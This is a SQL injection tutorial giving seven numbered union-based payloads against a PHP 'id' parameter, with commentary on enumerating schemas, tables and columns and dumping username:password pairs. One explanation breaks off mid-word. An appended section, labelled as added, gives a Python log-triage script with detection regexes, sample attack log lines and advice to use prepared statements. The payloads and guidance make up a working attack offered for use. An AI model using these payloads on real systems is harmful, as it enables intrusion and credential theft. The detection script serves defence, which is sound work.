1- site.com/index.php?id=1'
2- site.com/index.php?id=1 order by 10--
3- site.com/index.php?id=-1 union select 1,version(),3,4,5,6,7,8,9,10--
4- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(schema_name),6,7,8,9,10 from information_schema.schemata--
5- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10 from information_schema.tables where table_schema=0x(hexed database)--
6- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(column_name),6,7,8,9,10 from information_schema.columns where table_schema=0x(hexed database) and table_name=0x(hexed table name)--
7- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10 from "database"."table"--
Explanation:
3- In this step we use version() to get the version of the database we're going to attack. Instead of version() you can use:
@@version or unhex(he

4- Here we retrieve all the database names that can be found. I am sure I said that before, but anyway: NEVER USE database(), because it only displays the main database, which is completely useless. Using what is written in step 4 displays all of the databases at once.
5- In this step we get the table names from a specified database. This is why we added where table_schema=0x(hexed database): we want to retrieve the table names from the database we specified.
6- In this step we do the same thing for the columns. The only difference is that we also added table_name to specify which table we want the columns from. Now I have to say something that people don't really care about: people try to retrieve the columns of a specified table name without using table_schema. wtf, if you don't specify which database you may face some real shit:
- If there are two tables that have the same name but are in different databases, you will be facing some real shit because the query you used is shit
- Simply, this sometimes doesn't work
So stick to what is written in step 6, it always works: if we give the right info and details, we will get the right info and details we are looking for.
7- In this step we retrieve the data inside the columns. This is simple, just make sure you use from databasename.tablename, because if you don't you will face the same shit you face when you only mention the table without mentioning the database:
- If there are two tables that have the same name but are in different databases, you will be facing some real shit because the query you used is shit
- Simply, this sometimes doesn't work
So stick to what is written in step 6, it always works: if we give the right info and details, we will get the right info and details we are looking for.
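
Seen from the server side, every step above leaves a distinct value in the id parameter of the access log. The script below is an added example, not part of the original tutorial: it labels each request with the step it corresponds to. The log lines, the combined log format, the 0x74657374 value and the label names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One pattern per step of the walkthrough above, most specific first.
STAGES = [
    ("schema-enumeration", re.compile(r"information_schema\s*\.\s*\w+", re.I)),  # steps 4-6
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),        # steps 3, 7
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),             # step 2
    ("quote-probe", re.compile(r"^-?\d+\s*'$")),                                 # step 1
]
# Request line as it appears in a combined-format access log (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target, param="id"):
    """Return None when every `param` value is a plain integer, else a label."""
    query = urlsplit(target).query
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        value = value.strip()
        if re.fullmatch(r"\d+", value):
            continue  # the only shape a numeric id should ever have
        for label, pattern in STAGES:
            if pattern.search(value):
                return label
        return "non-integer-id"  # not a known step, but still not an integer
    return None

def triage(log_lines, param="id"):
    """Return (request target, label) for every flagged log line."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        label = classify(match.group(1), param) if match else None
        if label:
            findings.append((match.group(1), label))
    return findings

SAMPLE_LOG = [  # constructed log lines, documentation IP range
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 0',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /index.php?id=-1%20union%20select%201,version(),3,4,5,6,7,8,9,10-- HTTP/1.1" 200 530',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10+from+information_schema.tables+where+table_schema=0x74657374-- HTTP/1.1" 200 700',
    '203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /index.php?id=abc HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for target, label in triage(SAMPLE_LOG):
        print(f"{label:20} {target}")
```

Pattern matching like this is for log triage only. The fix belongs in the application: bind id as an integer parameter in a prepared statement, and none of the seven requests reaches the SQL parser as syntax.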